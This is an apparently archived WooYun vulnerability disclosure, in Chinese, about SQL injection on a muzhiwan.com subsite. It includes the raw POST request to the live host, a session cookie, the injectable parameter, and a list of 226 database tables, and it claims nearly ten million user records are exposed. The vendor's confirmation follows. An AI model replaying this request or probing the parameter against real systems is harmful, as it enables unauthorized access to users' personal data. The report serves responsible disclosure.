当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148779

漏洞标题:拇指玩某分站存在SQL注入漏洞(涉及千万用户)

相关厂商:muzhiwan.com

漏洞作者: 路人甲

提交时间:2015-10-23 09:01

修复时间:2015-12-07 15:38

公开时间:2015-12-07 15:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-23: 细节已通知厂商并且等待厂商处理中
2015-10-23: 厂商已经确认,细节仅向厂商公开
2015-11-02: 细节向核心白帽子及相关领域专家公开
2015-11-12: 细节向普通白帽子公开
2015-11-22: 细节向实习白帽子公开
2015-12-07: 细节向公众公开

简要描述:

详细说明:

POST /?action=game&navTabId=create_new_game&opt=addSave HTTP/1.1
Content-Length: 624
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://open.muzhiwan.com:80/
Cookie: PHPSESSID=sughd79go0e42smscfhl6pjpq7
Host: open.muzhiwan.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
agencyimg=&agencyimg_file=%e4%b8%8a%e4%bc%a0%e7%8b%ac%e4%bb%a3%e6%8e%88%e6%9d%83%e4%b9%a6&copyrightimg=&copyrightimg_file=&cover=&cover_file=&current_upload_id=1&date=01/01/1967&descript=1&exit=&gametype=1&gname=njpbaqht&hezuo=334&icon=&icon512=&icon512_file=&icon_file=&isself=0&qudao=%e7%94%b5%e4%bf%a1&remark=1&sdate=%e5%a4%a7%e6%a6%82%e6%97%b6%e9%97%b4%ef%bc%8c%e5%a6%82%ef%bc%9a%e4%b8%83%e6%9c%88%e5%88%9d&selecttest1=2&serviceTel=555-666-0606&shot%5b%5d=&shot_file_add1=&tid=31&video=1

注入点:current_upload_id

11.png

25个库:

333.png

555.jpg

Database: mzw
[226 tables]
+--------------------------------+
| group |
| mzw_users-1 |
| auth |
| auth_group |
| auth_group_relation |
| auth_usergroup |
| group_apply |
| group_glance |
| group_identity |
| group_interior |
| group_member |
| group_member_log |
| group_recommend |
| group_report |
| group_score |
| group_score_list |
| group_topic |
| group_topic_content |
| group_topic_love |
| lanxun_url |
| market_model_info |
| models |
| mwz_sdk_user_reg_log |
| mzw_ad |
| mzw_ad_p |
| mzw_admin |
| mzw_admin_editlog |
| mzw_admin_gameeditlog |
| mzw_admin_group |
| mzw_bbs_topic |
| mzw_blacklist |
| mzw_c_ad |
| mzw_c_admin |
| mzw_c_channel |
| mzw_c_game |
| mzw_c_game_detail |
| mzw_c_game_down |
| mzw_c_game_snapshot |
| mzw_c_hotsearch |
| mzw_c_uc_mapping |
| mzw_censorword |
| mzw_content_from |
| mzw_cp_bill |
| mzw_cp_contact |
| mzw_cp_fee_ratio |
| mzw_cp_game |
| mzw_cp_game_1 |
| mzw_cp_game_append |
| mzw_cp_game_gift |
| mzw_cp_game_gift_code |
| mzw_cp_game_sdk |
| mzw_cp_game_v |
| mzw_cp_game_v_article |
| mzw_cp_game_v_img |
| mzw_cp_game_v_motion |
| mzw_cp_member |
| mzw_cp_msg |
| mzw_cp_notice |
| mzw_cp_order |
| mzw_cp_pay |
| mzw_cp_sdk |
| mzw_cp_testfee |
| mzw_cp_testin |
| mzw_cp_user |
| mzw_cp_users_resetpwd |
| mzw_crack_wishing |
| mzw_crontab_game |
| mzw_dabaoprogress |
| mzw_datacopypath |
| mzw_day_gamecount |
| mzw_exam_score |
| mzw_exam_title |
| mzw_favorite |
| mzw_feedback |
| mzw_feedback_app |
| mzw_feeds |
| mzw_fetch_html |
| mzw_friend_links |
| mzw_game |
| mzw_game_album |
| mzw_game_album_comment |
| mzw_game_album_comment_reply |
| mzw_game_album_contents |
| mzw_game_article |
| mzw_game_article_auth |
| mzw_game_article_comment |
| mzw_game_article_comment_reply |
| mzw_game_article_detail |
| mzw_game_article_detail_copy |
| mzw_game_article_type |
| mzw_game_article_vote |
| mzw_game_black |
| mzw_game_device_package |
| mzw_game_extend |
| mzw_game_firm |
| mzw_game_firm_comment |
| mzw_game_firm_comment_reply |
| mzw_game_google |
| mzw_game_img_webp |
| mzw_game_net_forum |
| mzw_game_net_gift |
| mzw_game_net_giftbind |
| mzw_game_net_giftorder |
| mzw_game_net_server |
| mzw_game_open |
| mzw_game_search_tags |
| mzw_game_search_tags_bind |
| mzw_game_tags |
| mzw_game_tags_bind |
| mzw_game_tags_type |
| mzw_game_tmp |
| mzw_game_type |
| mzw_game_unzip |
| mzw_game_unzip_diff |
| mzw_game_unzip_sub |
| mzw_game_v |
| mzw_game_v_comment |
| mzw_game_v_comment_reply |
| mzw_game_v_cp |
| mzw_game_v_cps |
| mzw_game_v_detail |
| mzw_game_v_diff |
| mzw_game_v_downlist |
| mzw_game_v_downlist_back |
| mzw_game_v_downlist_copy |
| mzw_game_v_downtop |
| mzw_game_v_icon_temp |
| mzw_game_v_img |
| mzw_game_v_img_copy |
| mzw_game_v_img_temp |
| mzw_game_v_video |
| mzw_game_vblacklist |
| mzw_game_vote |
| mzw_gift_bbs |
| mzw_gift_weixin |
| mzw_gift_weixin_copy |
| mzw_gift_weixin_copy1 |
| mzw_google_apps |
| mzw_handle_brand |
| mzw_handle_model |
| mzw_hotword_tab |
| mzw_log_ad_click_201302 |
| mzw_log_downloadgame_0 |
| mzw_log_goodarticle_0 |
| mzw_log_goodgame_0 |
| mzw_log_goodsavegame_2013 |
| mzw_log_login_201301 |
| mzw_log_sf_download_0 |
| mzw_mobile_brand |
| mzw_mobile_cpubrand |
| mzw_mobile_cpubrand_adp |
| mzw_mobile_cpumodel |
| mzw_mobile_forum |
| mzw_mobile_manual_pwd |
| mzw_mobile_model |
| mzw_mobile_modelcode |
| mzw_mobile_modelcode_rel |
| mzw_mobile_verify_message |
| mzw_models |
| mzw_our_company |
| mzw_our_postinfo |
| mzw_pay |
| mzw_pc_feedback |
| mzw_phone_msg_log |
| mzw_project |
| mzw_project_picture |
| mzw_question |
| mzw_question_answer |
| mzw_report_tab |
| mzw_save_game |
| mzw_save_game_blacklist |
| mzw_save_game_category |
| mzw_save_game_comment |
| mzw_save_game_comment_reply |
| mzw_save_game_for |
| mzw_save_game_for_comment |
| mzw_save_game_img |
| mzw_save_game_send |
| mzw_save_gamenotexistgame |
| mzw_sdk_notice |
| mzw_sdk_oauth2_authcodes |
| mzw_sdk_oauth2_clients |
| mzw_sdk_oauth2_tokens |
| mzw_sdk_pay_notifyrecord |
| mzw_sdk_pay_orders |
| mzw_sdk_pay_orders_info |
| mzw_sdk_pay_yeepaytoken |
| mzw_sdk_phone_msg_log |
| mzw_short_url |
| mzw_short_url_key |
| mzw_snoopy_game |
| mzw_snoopy_gift |
| mzw_u_test |
| mzw_update |
| mzw_user_anwer |
| mzw_user_game |
| mzw_user_gamev |
| mzw_user_gamevcomment |
| mzw_user_gamevcomment_reply |
| mzw_user_gamevdetail |
| mzw_user_gamevdownlist |
| mzw_user_gamevimg |
| mzw_user_reg |
| mzw_userbehavior |
| mzw_userdevice |
| mzw_userdevice_bind |
| mzw_users |
| mzw_users_1 |
| mzw_users_6 |
| mzw_users_accesstoken |
| mzw_users_origin |
| mzw_users_phone |
| mzw_users_photo_create |
| mzw_users_profile |
| mzw_users_resetpwd |
| mzw_users_sign |
| mzw_weibo_score |
| mzw_weixin_blacklist |
| mzw_weixin_share |
| mzw_weixin_user_info |
| mzw_weixin_user_prize |
| mzw_weixin_user_sign |
| mzw_zhuanti_comment |
| pre_ucenter_members_cpfrom502 |
| static_sdk_compatibility |
| tmp_02 |
+--------------------------------+

涉及988万用户数据:

777.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-10-23 15:36

厂商回复:

十分感谢,我们会及时修复

最新状态:

暂无